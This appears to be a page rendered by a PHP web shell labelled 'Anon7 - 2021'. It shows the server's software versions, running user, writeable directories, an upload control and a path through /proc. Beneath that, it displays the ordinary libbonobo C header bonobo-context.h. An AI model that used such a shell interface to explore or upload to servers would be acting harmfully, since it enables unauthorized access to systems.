KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /proc/21585/root/usr/include/libbonobo-2.0/bonobo/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/21585/root/usr/include/libbonobo-2.0/bonobo/bonobo-context.h
/* -*- Mode: C; tab-width: 8; indent-tabs-mode: t; c-basic-offset: 8 -*- */
/**
 * bonobo-context.h: Handle Global Component contexts.
 *
 * Author:
 *     Michael Meeks (michael@helixcode.com)
 *
 * Copyright 2000 Helix Code, Inc.
 */
#ifndef _BONOBO_CONTEXT_H_
#define _BONOBO_CONTEXT_H_

#include <bonobo/bonobo-object.h>

Bonobo_Unknown bonobo_context_get (const CORBA_char  *context_name,
				   CORBA_Environment *opt_ev);

void           bonobo_context_add (const CORBA_char  *context_name,
				   Bonobo_Unknown     context);

/* emits a 'last_unref' signal */
BonoboObject  *bonobo_context_running_get (void);

void           bonobo_running_context_auto_exit_unref (BonoboObject *object);

#endif /* _BONOBO_CONTEXT_H_ */

Anon7 - 2021